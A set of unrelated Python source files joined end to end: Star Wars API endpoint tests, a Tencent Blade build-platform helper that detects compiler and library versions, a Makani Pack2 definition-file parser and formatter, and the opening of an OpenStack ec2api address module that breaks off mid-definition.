def test_films_root(self):
self.assertEqual(
self.get_query("/api/films/").status_code, 200)
def test_films_schema(self):
self.assertEqual(
self.get_query("/api/films/schema").status_code, 200)
def test_films_search(self):
response = self.get_query("/api/films/?search=sith")
json_data = json.loads(response.content)
film = Film.objects.get(title='Revenge of the Sith')
self.assertEqual(response.status_code, 200)
list_response = self.get_query("/api/films/")
list_data = json.loads(list_response.content)
self.assertLess(json_data["count"],list_data["count"])
self.assertEqual(film.title, json_data["results"][0]["title"])
def test_starships_root(self):
self.assertEqual(
self.get_query("/api/starships/").status_code, 200)
def test_starship_schema(self):
self.assertEqual(
self.get_query("/api/starships/schema").status_code, 200)
def test_starship_search(self):
response = self.get_query("/api/starships/?search=x1")
json_data = json.loads(response.content)
ship = Starship.objects.get(name='TIE Advanced x1')
self.assertEqual(response.status_code, 200)
list_response = self.get_query("/api/starships/")
list_data = json.loads(list_response.content)
self.assertLess(json_data["count"],list_data["count"])
self.assertEqual(ship.name, json_data["results"][0]["name"])
def test_vehicles_root(self):
self.assertEqual(
self.get_query("/api/vehicles/").status_code, 200)
def test_vehicle_schema(self):
self.assertEqual(
self.get_query("/api/vehicles/schema").status_code, 200)
def test_vehicle_search(self):
response = self.get_query("/api/vehicles/?search=crawler")
json_data = json.loads(response.content)
vehicle = Vehicle.objects.get(name='Sand Crawler')
self.assertEqual(response.status_code, 200)
list_response = self.get_query("/api/vehicles/")
list_data = json.loads(list_response.content)
self.assertLess(json_data["count"],list_data["count"])
self.assertEqual(vehicle.name, json_data["results"][0]["name"])
def test_species_root(self):
self.assertEqual(
self.get_query("/api/species/").status_code, 200)
def test_species_schema(self):
self.assertEqual(
self.get_query("/api/species/schema").status_code, 200)
def test_species_search(self):
response = self.get_query("/api/species/?search=calamari")
json_data = json.loads(response.content)
species = Species.objects.get(name='Mon Calamari')
self.assertEqual(response.status_code, 200)
list_response = self.get_query("/api/species/")
list_data = json.loads(list_response.content)
self.assertLess(json_data["count"],list_data["count"])
self.assertEqual(species.name, json_data["results"][0]["name"])
def test_people_detail(self):
response = self.get_query("/api/people/1/")
json_data = json.loads(response.content)
person = People.objects.get(pk=1)
self.assertEqual(response.status_code, 200)
self.assertEqual(person.name, json_data["name"])
def test_planets_detail(self):
response = self.get_query("/api/planets/1/")
json_data = json.loads(response.content)
planet = Planet.objects.get(pk=1)
self.assertEqual(response.status_code, 200)
self.assertEqual(planet.name, json_data["name"])
def test_films_detail(self):
response = self.get_query("/api/films/1/")
json_data = json.loads(response.content)
film = Film.objects.get(pk=1)
self.assertEqual(response.status_code, 200)
self.assertEqual(film.title, json_data["title"])
def test_starships_detail(self):
response = self.get_query("/api/starships/2/")
json_data = json.loads(response.content)
starship = Starship.objects.get(pk=2)
self.assertEqual(response.status_code, 200)
self.assertEqual(starship.name, json_data["name"])
def test_vehicles_detail(self):
response = self.get_query("/api/vehicles/4/")
json_data = json.loads(response.content)
vehicle = Vehicle.objects.get(pk=4)
self.assertEqual(response.status_code, 200)
self.assertEqual(vehicle.name, json_data["name"])
def test_species_detail(self):
response = self.get_query("/api/species/1/")
json_data = json.loads(response.content)
specie = Species.objects.get(pk=1)
self.assertEqual(response.status_code, 200)
self.assertEqual(specie.name, json_data["name"])
def test_etag(self):
valid_etag = self.get_query("/api/")["ETag"]
self.client.defaults['HTTP_IF_NONE_MATCH'] = valid_etag
self.assertEqual(
self.get_query("/api/").status_code, 304)
def test_wookie_renderer(self):
wookiee_renderer = WookieeRenderer()
translated_data = wookiee_renderer.translate_to_wookie("swapi")
self.assertEqual(translated_data, "cohraakah")
translated_data = wookiee_renderer.translate_to_wookie("")
self.assertEqual(translated_data, "")
def test_wookie_format(self):
wr = WookieeRenderer()
response = self.get_query("/api/species/1/?format=wookiee")
json_data = json.loads(response.content)
specie = Species.objects.get(pk=1)
self.assertEqual(response.status_code, 200)
self.assertEqual(
wr.translate_to_wookie(specie.name),
json_data[wr.translate_to_wookie("name")]
)
| |
# Copyright (c) 2011 Tencent Inc.
# All rights reserved.
#
# Author: Chong Peng <michaelpeng@tencent.com>
# Date: October 20, 2011
"""
This is the blade_platform module which dues with the environment
variable.
"""
import os
import subprocess
import configparse
from blade_util import var_to_list
class SconsPlatform(object):
"""The scons platform class that it handles and gets the platform info. """
def __init__(self):
"""Init. """
self.gcc_version = self._get_gcc_version('gcc')
self.python_inc = self._get_python_include()
self.php_inc_list = self._get_php_include()
self.java_inc_list = self._get_java_include()
self.nvcc_version = self._get_nvcc_version('nvcc')
self.cuda_inc_list = self._get_cuda_include()
@staticmethod
def _get_gcc_version(compiler):
"""Get the gcc version. """
p = subprocess.Popen(
compiler + ' --version',
env=os.environ,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
shell=True,
universal_newlines=True)
(stdout, stderr) = p.communicate()
if p.returncode == 0:
version_line = stdout.splitlines(True)[0]
version = version_line.split()[2]
return version
return ''
@staticmethod
def _get_nvcc_version(compiler):
"""Get the nvcc version. """
p = subprocess.Popen(
compiler + ' --version',
env=os.environ,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
shell=True,
universal_newlines=True)
(stdout, stderr) = p.communicate()
if p.returncode == 0:
version_line = stdout.splitlines(True)[-1]
version = version_line.split()[5]
return version
return ''
@staticmethod
def _get_python_include():
"""Get the python include dir. """
p = subprocess.Popen(
'python-config --includes',
env=os.environ,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
shell=True,
universal_newlines=True)
(stdout, stderr) = p.communicate()
if p.returncode == 0:
include_line = stdout.splitlines(True)[0]
header = include_line.split()[0][2:]
return header
return ''
@staticmethod
def _get_php_include():
p = subprocess.Popen(
'php-config --includes',
env=os.environ,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
shell=True,
universal_newlines=True)
(stdout, stderr) = p.communicate()
if p.returncode == 0:
include_line = stdout.splitlines(True)[0]
headers = include_line.split()
header_list = ["'%s'" % s[2:] for s in headers]
return header_list
return []
@staticmethod
def _get_java_include():
include_list = []
java_home = os.environ.get('JAVA_HOME', '')
if java_home:
include_list.append('%s/include' % java_home)
include_list.append('%s/include/linux' % java_home)
return include_list
p = subprocess.Popen(
'java -version',
env=os.environ,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True,
universal_newlines=True)
(stdout, stderr) = p.communicate()
if p.returncode == 0:
version_line = stdout.splitlines(True)[0]
version = version_line.split()[2]
version = version.replace('"', '')
include_list.append('/usr/java/jdk%s/include' % version)
include_list.append('/usr/java/jdk%s/include/linux' % version)
return include_list
return []
@staticmethod
def _get_cuda_include():
include_list = []
cuda_path = os.environ.get('CUDA_PATH')
if cuda_path:
include_list.append('%s/include' % cuda_path)
include_list.append('%s/samples/common/inc' % cuda_path)
return include_list
p = subprocess.Popen(
'nvcc --version',
env=os.environ,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
shell=True,
universal_newlines=True)
(stdout, stderr) = p.communicate()
if p.returncode == 0:
version_line = stdout.splitlines(True)[-1]
version = version_line.split()[4]
version = version.replace(',', '')
if os.path.isdir('/usr/local/cuda-%s' % version):
include_list.append('/usr/local/cuda-%s/include' % version)
include_list.append('/usr/local/cuda-%s/samples/common/inc' % version)
return include_list
return []
def get_gcc_version(self):
"""Returns gcc version. """
return self.gcc_version
def get_python_include(self):
"""Returns python include. """
return self.python_inc
def get_php_include(self):
"""Returns a list of php include. """
return self.php_inc_list
def get_java_include(self):
"""Returns a list of java include. """
return self.java_inc_list
def get_nvcc_version(self):
"""Returns nvcc version. """
return self.nvcc_version
def get_cuda_include(self):
"""Returns a list of cuda include. """
return self.cuda_inc_list
class CcFlagsManager(object):
"""The CcFlagsManager class.
This class manages the compile warning flags.
"""
def __init__(self, options):
self.options = options
self.cpp_str = ''
def _filter_out_invalid_flags(self, flag_list, language=''):
"""filter the unsupported compliation flags. """
flag_list_var = var_to_list(flag_list)
xlanguage = ''
if language:
xlanguage = '-x' + language
ret_flag_list = []
for flag in flag_list_var:
cmd_str = 'echo "" | %s %s %s >/dev/null 2>&1' % (
self.cpp_str, xlanguage, flag)
if subprocess.call(cmd_str, shell=True) == 0:
ret_flag_list.append(flag)
return ret_flag_list
def set_cpp_str(self, cpp_str):
"""set up the cpp_str. """
self.cpp_str = cpp_str
def get_flags_except_warning(self):
"""Get the flags that are not warning flags. """
flags_except_warning = ['-m%s' % self.options.m, '-mcx16', '-pipe']
linkflags = ['-m%s' % self.options.m]
# Debigging information setting
if self.options.no_debug_info:
flags_except_warning += ['-g0']
else:
if self.options.profile == 'debug':
flags_except_warning += ['-ggdb3']
elif self.options.profile == 'release':
flags_except_warning += ['-g']
# Option debugging flags
if self.options.profile == 'debug':
flags_except_warning += ['-fstack-protector']
elif self.options.profile == 'release':
flags_except_warning += ['-DNDEBUG']
flags_except_warning += [
'-D_FILE_OFFSET_BITS=64',
'-D__STDC_CONSTANT_MACROS',
'-D__STDC_FORMAT_MACROS',
'-D__STDC_LIMIT_MACROS',
]
if getattr(self.options, 'gprof', False):
flags_except_warning.append('-pg')
linkflags.append('-pg')
if getattr(self.options, 'gcov', False):
if SconsPlatform().gcc_version > '4.1':
flags_except_warning.append('--coverage')
linkflags.append('--coverage')
else:
flags_except_warning.append('-fprofile-arcs')
flags_except_warning.append('-ftest-coverage')
linkflags += ['-Wl,--whole-archive', '-lgcov',
'-Wl,--no-whole-archive']
flags_except_warning = self._filter_out_invalid_flags(
flags_except_warning)
return (flags_except_warning, linkflags)
def get_warning_flags(self):
"""Get the warning flags. """
cc_config = configparse.blade_config.get_config('cc_config')
cppflags = cc_config['warnings']
cxxflags = cc_config['cxx_warnings']
cflags = cc_config['c_warnings']
filtered_cppflags = self._filter_out_invalid_flags(cppflags)
filtered_cxxflags = self._filter_out_invalid_flags(cxxflags, 'c++')
filtered_cflags = self._filter_out_invalid_flags(cflags, 'c')
return (filtered_cppflags, filtered_cxxflags, filtered_cflags)
| |
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Parser for Pack2 definition files."""
import re
from makani.lib.python.pack2 import metadata
from ply import lex
from ply import yacc
# PLY's token and parser rule naming conflicts with our style.
# pylint: disable=invalid-name
class Formatter(object):
"""Pack2 code formatter.
This class is fed tokens from the lexer and produces a conically formatted
version of the code.
"""
# Maps each block type to its line terminating character.
_new_line_char_map = {
'bitfield8': ',',
'bitfield16': ',',
'bitfield32': ',',
'enum8': ',',
'enum16': ',',
'enum32': ',',
'header': ';',
'param': ';',
'scaled8': ',',
'scaled16': ',',
'scaled32': ',',
'specialize': ';',
'struct': ';',
}
# Tokens that eat whitespace after them.
_whitespace_eaters = set([
'[',
'(',
])
def __init__(self):
self.preamble = ''
self.formatted = ''
self.first_line = True
self.new_line = ''
self.block_level = 0
self.indent = ' '
self.new_line_char = None
self.eat_whitespace = False
self.extra_new_line = False
self.prev_token = None
self.eat_new_line = False
self.ignore_line = False
def _NextNewLine(self, token):
"""Return the nominal line break for the next statement."""
if self.block_level == 0 and token == ';':
self.eat_new_line = True
return '\n\n'
if token == '}':
self.eat_new_line = True
return '\n\n'
elif token == '{':
self.eat_new_line = True
return '\n'
elif token == self.new_line_char:
return '\n'
else:
return None
def _ExtraNewLineAllowed(self, token):
"""Determine if an extra new line is allowed.
Args:
token: The token currently being added.
Returns:
True if an extra new line is allowed before the current statement.
"""
if self.block_level < 1:
return False
if token == '}':
return False
if self.eat_new_line:
return False
return True
def _BlockIndent(self):
indent = ''
for _ in range(0, self.block_level):
indent += self.indent
return indent
def _NewLine(self, token):
"""Calculate line break.
Calculates the appropriate line break sequence to proceed the current
token being added.
Args:
token: The token currently being added.
Returns:
A string containing the appropriate line break sequence.
"""
if self.extra_new_line and self._ExtraNewLineAllowed(token):
# Single blank lines are allowed within blocks to allow for logical
# grouping of fields/values.
new_line = '\n\n'
else:
new_line = self.new_line
self.extra_new_line = False
self.eat_new_line = False
return new_line + self._BlockIndent()
def AddToken(self, token, whitespace):
"""Add a token to the formatter.
Args:
token: The token to add.
whitespace: The nominal whitespace to add before the token.
"""
# Ignore include lines. These will be prepended later in alphabetical
# order.
if not self.prev_token or self.prev_token == '\n':
if token == 'include':
self.ignore_line = True
if self.ignore_line:
return
if self.new_line:
self.formatted += self._NewLine(token)
elif not self.first_line and not self.eat_whitespace:
self.formatted += whitespace
self.formatted += str(token)
self.new_line = self._NextNewLine(token)
self.first_line = False
self.eat_whitespace = token in self._whitespace_eaters
if token in self._new_line_char_map:
self.new_line_char = self._new_line_char_map[token]
self.prev_token = token
def AddComment(self, comment):
"""Add comment to the formatter."""
# Special case comments at the top of files as they are allowed to come
# before include directive.
if self.first_line:
self.preamble += '// ' + str(comment) + '\n'
return
if self.prev_token == '\n' or self.first_line:
# A comment following a new line should be on it's own line.
self.formatted += self._NewLine('')
else:
# Otherwise it should be exactly two spaces after the end of line.
self.formatted += ' '
self.formatted += '// ' + str(comment)
self.new_line = '\n'
def ProcessNewLine(self, count):
self.prev_token = '\n'
self.extra_new_line = count > 1
self.ignore_line = False
def EnterBlock(self):
self.block_level += 1
def ExitBlock(self):
self.block_level -= 1
class ParseError(Exception):
def __init__(self, value, errors):
super(self.__class__, self).__init__(value)
self.errors = errors
self.value = value
def __str__(self):
string = self.value + '\n'
for e in self.errors:
string += e
return string
class Lexer(object):
"""Lexer for Pack2 definition files."""
def __init__(self, error_func):
self.error_func = error_func
self.formatter = Formatter()
def Build(self, **kwargs):
# Building the lexer is separate from __init__() because the PLY
# docs warn against calling lex() from __init__
self.lexer = lex.lex(object=self, **kwargs)
keywords = [
'BITFIELD8',
'BITFIELD16',
'BITFIELD32',
'ENUM8',
'ENUM16',
'ENUM32',
'HEADER',
'INCLUDE',
'PARAM',
'SCALED8',
'SCALED16',
'SCALED32',
'SPECIALIZE',
'STRING',
'STRUCT',
]
keyword_map = {keyword.lower(): keyword for keyword in keywords}
tokens = keywords + [
'ID',
'COLON',
'COMMA',
'EQUAL',
'SEMICOLON',
'LCURLY',
'RCURLY',
'LPAREN',
'RPAREN',
'LSQUARE',
'RSQUARE',
'FLOAT_LITERAL',
'HEX_LITERAL',
'BIN_LITERAL',
'NEG_DEC_LITERAL',
'DEC_LITERAL',
'STRING_LITERAL',
]
# Ignored characters
t_ignore = ' \t'
# Tokens
#
# PLY makes use of docstrings in token functions to specify the token regex.
# Furthermore it uses raw strings because, according the manual, "they are the
# most convenient way to write regular expression strings."
#
# pylint: disable=g-docstring-quotes,g-short-docstring-punctuation
# The order of the functions here reflects the order in which the
# lexer matches tokens.
def t_FLOAT_LITERAL(self, t):
r'[-+]?[0-9]*\.[0-9]+([eE][-+]?[0-9]+)?'
self.formatter.AddToken(t.value, ' ')
t.value = float(t.value)
return t
def t_HEX_LITERAL(self, t):
r'0x[0-9A-Fa-f]+'
self.formatter.AddToken(t.value, ' ')
t.value = int(t.value[2:], 16)
return t
def t_BIN_LITERAL(self, t):
r'0b[01]+'
self.formatter.AddToken(t.value, ' ')
t.value = int(t.value[2:], 2)
return t
def t_NEG_DEC_LITERAL(self, t):
r'-(0|[1-9][0-9]*)'
self.formatter.AddToken(t.value, ' ')
t.value = int(t.value, 10)
return t
def t_DEC_LITERAL(self, t):
r'\+?0|[1-9][0-9]*'
self.formatter.AddToken(t.value, ' ')
t.value = int(t.value, 10)
return t
def t_STRING_LITERAL(self, t):
r'"[^"]*"'
self.formatter.AddToken(t.value, ' ')
t.value = t.value[1:-1] # Remove quotes.
return t
def t_ID(self, t):
r'[a-zA-Z_][a-zA-Z0-9_]*'
self.formatter.AddToken(t.value, ' ')
t.type = self.keyword_map.get(t.value, 'ID')
return t
def t_comment(self, t):
r'//[ \t]*(?P<comment_text>.*)'
self.formatter.AddComment(t.lexer.lexmatch.group('comment_text'))
def t_newline(self, t):
r'\n+'
self.formatter.ProcessNewLine(t.value.count('\n'))
t.lexer.lineno += t.value.count('\n')
def t_COLON(self, t):
r':' # pylint: disable=invalid-name
self.formatter.AddToken(t.value, '')
return t
def t_COMMA(self, t):
r',' # pylint: disable=invalid-name
self.formatter.AddToken(t.value, '')
return t
def t_EQUAL(self, t):
r'=' # pylint: disable=invalid-name
self.formatter.AddToken(t.value, ' ')
return t
def t_SEMICOLON(self, t):
r';' # pylint: disable=invalid-name
self.formatter.AddToken(t.value, '')
return t
def t_LCURLY(self, t):
r'\{' # pylint: disable=invalid-name
self.formatter.AddToken(t.value, ' ')
self.formatter.EnterBlock()
return t
def t_RCURLY(self, t):
r'\}' # pylint: disable=invalid-name
self.formatter.ExitBlock()
self.formatter.AddToken(t.value, '')
return t
def t_LPAREN(self, t):
r'\(' # pylint: disable=invalid-name
self.formatter.AddToken(t.value, '')
self.formatter.EnterBlock()
return t
def t_RPAREN(self, t):
r'\)' # pylint: disable=invalid-name
self.formatter.ExitBlock()
self.formatter.AddToken(t.value, '')
return t
def t_LSQUARE(self, t):
r'\[' # pylint: disable=invalid-name
self.formatter.AddToken(t.value, '')
return t
def t_RSQUARE(self, t):
r'\]' # pylint: disable=invalid-name
self.formatter.AddToken(t.value, '')
return t
def t_error(self, t):
self.error_func('%d: Illegal character \'%s\'' % (t.lineno, t.value[0]))
t.lexer.skip(1)
# pylint: enable=g-docstring-quotes,g-short-docstring-punctuation
class _DefaultFileLoader(object):
def __init__(self):
pass
def ReadFile(self, file_name):
with open(file_name, 'r') as f:
contents = f.read()
return contents
class Parser(object):
"""Parser for Pack2 definition files."""
def __init__(self, file_loader=None, loaded_files=None):
self.lexer = Lexer(error_func=self._RecordError)
self.lexer.Build()
self.tokens = self.lexer.tokens
if loaded_files:
self.loaded_files = loaded_files
else:
self.loaded_files = set()
if file_loader is None:
self.file_loader = _DefaultFileLoader()
else:
self.file_loader = file_loader
self.include_re = re.compile(r'(.*)\.p2$')
# TODO: Investigate generating tables at build time and
# packaging them with the library.
self.parser = yacc.yacc(module=self, debug=False, write_tables=False)
def Parse(self, string):
"""Parse a Pack2 definition string."""
self.valid = True
self.metadata = metadata.Metadata()
self.errors = []
try:
self.parser.parse(string, tracking=True)
except IndexError as e:
# Due to a bug in PLY, an index error is caused if we raise a syntax
# error. If we've previously raised a syntax error, ignore it so that
# we can raise a ParseError instead.
if self.valid:
raise e
if not self.valid:
raise ParseError('Parse Error', self.errors)
return self.metadata
def GetFormattedSource(self):
preamble = self.lexer.formatter.preamble
if self.metadata.includes:
if preamble:
preamble += '\n'
for inc in sorted(self.metadata.includes):
preamble += ('include "%s.p2";\n' % inc)
preamble += '\n'
return preamble + self.lexer.formatter.formatted + '\n'
def _RecordError(self, string):
self.valid = False
self.errors.append(string)
def _RaiseError(self, string):
self._RecordError(string)
raise SyntaxError(string)
def HandleWidthType(self, base_name, p):
"""Common handing for types that have 8, 16, and 32 bit widths.
Grammar for type should be of the follow:
type_def : type_keyword ID LCURLY type_body RCURLY
Args:
base_name: The type's base name (eg. 'enum', 'bitfield', or 'scaled'.)
p: The PLY parser arguments from the production rule.
Returns:
A dict containing 'type', 'name', 'body', and 'width'.
"""
info = {
'type': p[1],
'name': p[2],
'body': p[4],
}
if info['type'] == base_name + '8':
info['width'] = 1
elif info['type'] == base_name + '16':
info['width'] = 2
elif info['type'] == base_name + '32':
info['width'] = 4
else:
self._RaiseError('%d: invalid %s type %s.\n'
% (p.lineno(1), base_name, info['type']))
return info
def ResolveType(self, type_name, lineno=-1):
if type_name not in self.metadata.type_map:
self._RaiseError('%d: Type \'%s\' unknown.\n' % (lineno, type_name))
raise SyntaxError
return self.metadata.type_map[type_name]
# PLY makes use of docstrings in production function to specify the grammar.
# These do not conform to the google style for doc strings.
#
# pylint: disable=g-short-docstring-punctuation
# pylint: disable=g-doc-args
# pylint: disable=g-no-space-after-docstring-summary
def p_file(self, p):
"""file : bitfield_def file
| enum_def file
| header_def file
| include_def file
| param_def file
| scaled_def file
| specialize_def file
| struct_def file
|
"""
def p_include_def(self, p):
"""include_def : INCLUDE STRING_LITERAL SEMICOLON"""
file_name = p[2]
match = self.include_re.match(file_name)
if not match:
self._RaiseError('%d: %s is not named like a p2 file.' % (p.lineno(2),
file_name))
path = match.group(1)
if file_name in self.loaded_files:
return
self.loaded_files.add(file_name)
contents = self.file_loader.ReadFile(file_name)
parser = Parser(file_loader=self.file_loader,
loaded_files=self.loaded_files)
meta = parser.Parse(contents)
try:
self.metadata.AddInclude(path, meta)
except ValueError as e:
self._RaiseError('%d: %s\n' % (p.lineno(2), e))
except SyntaxError as e:
self._RaiseError('%d: %s\n' % (p.lineno(2), e))
def p_struct_def(self, p):
"""struct_def : STRUCT ID LCURLY struct_body RCURLY"""
name = p[2]
body = p[4]
try:
self.metadata.AddType(metadata.StructType(name, body))
except SyntaxError as e:
self._RaiseError('%d: %s\n' % (p.lineno(2), e))
def p_enum_def(self, p):
"""enum_def : enum_keyword ID LCURLY enum_body RCURLY"""
try:
info = self.HandleWidthType('enum', p)
enum = metadata.EnumType(info['name'], info['width'], info['body'])
self.metadata.AddType(enum)
except SyntaxError as e:
self._RaiseError('%d: %s\n' % (p.lineno(2), e))
except ValueError as e:
self._RaiseError('%d: %s\n' % (p.lineno(2), e))
def p_enum8_keyword(self, p):
"""enum_keyword : ENUM8
| ENUM16
| ENUM32
"""
p[0] = p[1]
def p_bitfield_def(self, p):
"""bitfield_def : bitfield_keyword ID LCURLY bitfield_body RCURLY"""
try:
info = self.HandleWidthType('bitfield', p)
bitfield = metadata.BitfieldType(info['name'],
info['width'],
info['body'])
self.metadata.AddType(bitfield)
except SyntaxError as e:
self._RaiseError('%d: %s\n' % (p.lineno(2), e))
except ValueError as e:
self._RaiseError('%d: %s\n' % (p.lineno(2), e))
def p_bitfield8_keyword(self, p):
"""bitfield_keyword : BITFIELD8
| BITFIELD16
| BITFIELD32
"""
p[0] = p[1]
def p_scaled_def(self, p):
"""scaled_def : scaled_keyword ID LCURLY scaled_body RCURLY"""
try:
info = self.HandleWidthType('scaled', p)
if 'scale' not in info['body']:
self._RaiseError('%d: Scaled type %s does not contain scale property.'
%(p.lineno(2), info['name']))
if 'offset' not in info['body']:
self._RaiseError('%d: Scaled type %s does not contain offset property.'
%(p.lineno(2), info['name']))
scale = info['body']['scale']
offset = info['body']['offset']
scaled = metadata.ScaledType(info['name'], info['width'],
offset=offset, scale=scale)
self.metadata.AddType(scaled)
except SyntaxError as e:
self._RaiseError('%d: %s\n' % (p.lineno(2), e))
except ValueError as e:
self._RaiseError('%d: %s\n' % (p.lineno(2), e))
def p_scaled8_keyword(self, p):
"""scaled_keyword : SCALED8
| SCALED16
| SCALED32
"""
p[0] = p[1]
def p_param_def(self, p):
"""param_def : PARAM ID LCURLY struct_body RCURLY"""
name = p[2]
body = p[4]
try:
param = metadata.Param(name, body)
self.metadata.AddType(param)
except SyntaxError as e:
self._RaiseError('%d: %s\n' % (p.lineno(2), e))
def p_header_def(self, p):
"""header_def : HEADER ID LCURLY struct_body RCURLY"""
name = p[2]
body = p[4]
try:
header = metadata.Header(name, body)
self.metadata.AddType(header)
except SyntaxError as e:
self._RaiseError('%d: %s\n' % (p.lineno(2), e))
# pylint: disable=line-too-long
def p_speclialize_def(self, p):
"""specialize_def : SPECIALIZE LPAREN ID RPAREN ID LCURLY struct_body RCURLY"""
# pylint: enable=line-too-long
parent_name = p[3]
name = p[5]
body = p[7]
if parent_name not in self.metadata.type_map:
self._RaiseError('%d: Unknown parent type %s.\n'
% (p.lineno(2), parent_name))
parent_type = self.metadata.type_map[parent_name]
try:
new_type = parent_type.Specialize(name, body)
self.metadata.AddType(new_type)
except SyntaxError as e:
self._RaiseError('%d: %s\n' % (p.lineno(2), e))
except ValueError as e:
self._RaiseError('%d: %s\n' % (p.lineno(2), e))
def p_struct_body(self, p):
"""struct_body : struct_body field_def
| field_def
"""
try:
if len(p) == 2:
line = p.lineno(1)
body = metadata.StructBody()
body.AddField(p[1])
elif len(p) == 3:
line = p.lineno(2)
body = p[1]
body.AddField(p[2])
except SyntaxError as e:
self._RaiseError('%d: %s\n' % (line, e))
p[0] = body
def p_field_def(self, p):
"""field_def : ID ID SEMICOLON"""
type_name = p[1]
name = p[2]
field_type = self.ResolveType(type_name, p.lineno(1))
p[0] = metadata.StructField(field_type, name)
def p_string_field_def(self, p):
"""field_def : STRING LSQUARE unsigned_literal RSQUARE ID SEMICOLON"""
length = p[3]
name = p[5]
type_obj = metadata.StringType(length)
p[0] = metadata.StructField(type_obj, name)
def p_array_field_def(self, p):
"""field_def : ID ID LSQUARE unsigned_literal RSQUARE SEMICOLON"""
type_name = p[1]
name = p[2]
extent = p[4]
field_type = self.ResolveType(type_name, p.lineno(1))
p[0] = metadata.StructField(field_type, name, extent)
def p_enum_body(self, p):
"""enum_body : enum_body enum_value
| enum_value
"""
try:
if len(p) == 2:
line = p.lineno(1)
value = p[1]
body = metadata.EnumBody()
elif len(p) == 3:
line = p.lineno(2)
value = p[2]
body = p[1]
body.AddValue(value[0], value[1])
except SyntaxError as e:
self._RaiseError('%d: %s\n' % (line, e))
p[0] = body
def p_enum_value(self, p):
"""enum_value : ID EQUAL signed_literal COMMA"""
p[0] = (p[1], p[3])
def p_bitfield_body(self, p):
"""bitfield_body : bitfield_body bitfield_value
| bitfield_value
"""
try:
if len(p) == 2:
line = p.lineno(1)
value = p[1]
body = metadata.BitfieldBody()
elif len(p) == 3:
line = p.lineno(2)
value = p[2]
body = p[1]
body.AddFlag(value[0], value[1])
except SyntaxError as e:
self._RaiseError('%d: %s\n' % (line, e))
p[0] = body
def p_scaled_body(self, p):
"""scaled_body : scaled_body scaled_property
| scaled_property
"""
try:
if len(p) == 2:
line = p.lineno(1)
value = p[1]
body = {}
elif len(p) == 3:
line = p.lineno(2)
value = p[2]
body = p[1]
if value[0] in body:
self._RaiseError('%d: Scaled property %s repeated.' % (line, value[0]))
body[value[0]] = value[1]
except SyntaxError as e:
self._RaiseError('%d: %s\n' % (line, e))
p[0] = body
def p_scaled_property(self, p):
"""scaled_property : ID EQUAL FLOAT_LITERAL COMMA
| ID EQUAL signed_literal COMMA
"""
name = p[1]
value = p[3]
if name != 'scale' and name != 'offset':
self._RaiseError('%d: Unknown scaled property %s.' % (p.lineno(1), name))
p[0] = (name, value)
def p_bitfield_value(self, p):
"""bitfield_value : unsigned_literal COLON ID COMMA"""
p[0] = (p[3], p[1])
def p_unsigned_literal(self, p):
"""unsigned_literal : HEX_LITERAL
| DEC_LITERAL
| BIN_LITERAL
"""
p[0] = p[1]
def p_signed_literal(self, p):
"""signed_literal : unsigned_literal
| NEG_DEC_LITERAL
"""
p[0] = p[1]
def p_error(self, p):
self.valid = False
self.errors.append('%d: Syntax error at \'%s\'\n' % (p.lineno, p.value))
# pylint: enable=g-short-docstring-punctuation
# pylint: enable=g-no-space-after-docstring-summary
# pylint: enable=g-no-space-after-docstring-summary
# pylint: enable=invalid-name
| |
# Copyright 2014
# The Cloudscaling Group, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from neutronclient.common import exceptions as neutron_exception
except ImportError:
pass # clients will log absense of neutronclient in this case
from oslo_config import cfg
from oslo_log import log as logging
from ec2api.api import common
from ec2api.api import ec2utils
from ec2api.api import internet_gateway as internet_gateway_api
from ec2api import clients
from ec2api.db import api as db_api
from ec2api import exception
from ec2api.i18n import _
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
"""Address related API implementation
"""
Validator = common.Validator
def get_address_engine():
return AddressEngineNeutron()
def allocate_address(context, domain=None):
if domain and domain not in ['vpc', 'standard']:
msg = _("Invalid value '%(domain)s' for domain.") % {'domain': domain}
raise exception.InvalidParameterValue(msg)
address, os_floating_ip = address_engine.allocate_address(context, domain)
return _format_address(context, address, os_floating_ip)
def associate_address(context, public_ip=None, instance_id=None,
allocation_id=None, network_interface_id=None,
private_ip_address=None, allow_reassociation=False):
if not public_ip and not allocation_id:
msg = _('Either public IP or allocation id must be specified')
raise exception.MissingParameter(msg)
if public_ip and allocation_id:
msg = _('You may specify public IP or allocation id, '
'but not both in the same call')
raise exception.InvalidParameterCombination(msg)
if not instance_id and not network_interface_id:
msg = _('Either instance ID or network interface id must be specified')
raise exception.MissingParameter(msg)
associationId = address_engine.associate_address(
context, public_ip, instance_id,
allocation_id, network_interface_id,
private_ip_address, allow_reassociation)
if associationId:
return {'return': True,
'associationId': associationId}
return {'return': True}
def disassociate_address(context, public_ip=None, association_id=None):
if not public_ip and not association_id:
msg = _('Either public IP or association id must be specified')
raise exception.MissingParameter(msg)
if public_ip and association_id:
msg = _('You may specify public IP or association id, '
'but not both in the same call')
raise exception.InvalidParameterCombination(msg)
address_engine.disassociate_address(context, public_ip, association_id)
return True
def release_address(context, public_ip=None, allocation_id=None):
if not public_ip and not allocation_id:
msg = _('Either public IP or allocation id must be specified')
raise exception.MissingParameter(msg)
if public_ip and allocation_id:
msg = _('You may specify public IP or allocation id, '
'but not both in the same call')
raise exception.InvalidParameterCombination(msg)
address_engine.release_address(context, public_ip, allocation_id)
return True
class AddressDescriber(common.UniversalDescriber):
KIND = 'eipalloc'
FILTER_MAP = {'allocation-id': 'allocationId',
'association-id': 'associationId',
'domain': 'domain',
